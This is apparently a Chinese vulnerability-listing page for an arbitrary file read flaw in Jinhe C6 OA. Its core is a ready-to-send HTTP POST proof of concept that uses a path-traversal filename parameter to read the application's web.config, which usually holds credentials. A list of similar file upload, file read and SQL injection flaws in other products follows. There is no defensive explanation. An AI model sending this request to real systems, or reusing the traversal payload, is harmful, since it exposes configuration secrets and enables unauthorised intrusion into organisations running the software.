金和C6 FileUpload.aspx 存在任意文件读取漏洞

漏洞描述

PoC代码

POST /c6/JHSoft.WCF/FunctionNew/FileUpload.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

filename=../../../c6/web.config

相关漏洞推荐

• 锐明技术Crocus系统 DeviceFileUpload.do 任意文件读取漏洞
• MagicINFO SWUpdateFileUploader 文件上传漏洞
• 建文工程项目管理软件 /UserControl/FileUpload/FileUploadNew.ashx 文件上传漏洞
• POC yonyou-grp-u8-fileupload: 用友 GRP U8 FileUpload存在任意文件上传漏洞
• 金和OA /c6/jhsoft.wcf/functionnew/FileUpload.aspx 文件读取漏洞
• 汉王e脸通综合管理平台 monadFileUpload.do 任意文件上传漏洞
• 汉王e脸通综合管理平台 monadFileUpload.do 任意文件上传漏洞
• 环境空气质量联网管理平台 /Default/FileUpload 文件上传漏洞
• 灵当CRM /crm/modules/XlsImportNew/documentEntry/XlsFileUpload.php 文件上传漏洞
• 金和C6 IncentivePlanFulfillAppprove sql注入漏洞
• 朗速ERP /Api/FileUploadApi.ashx 文件上传漏洞
• 灵当CRM XlsFileUpload.php 任意文件上传漏洞
• 脸爱云一脸通智慧管理平台 monadFileUpload.do 任意文件上传漏洞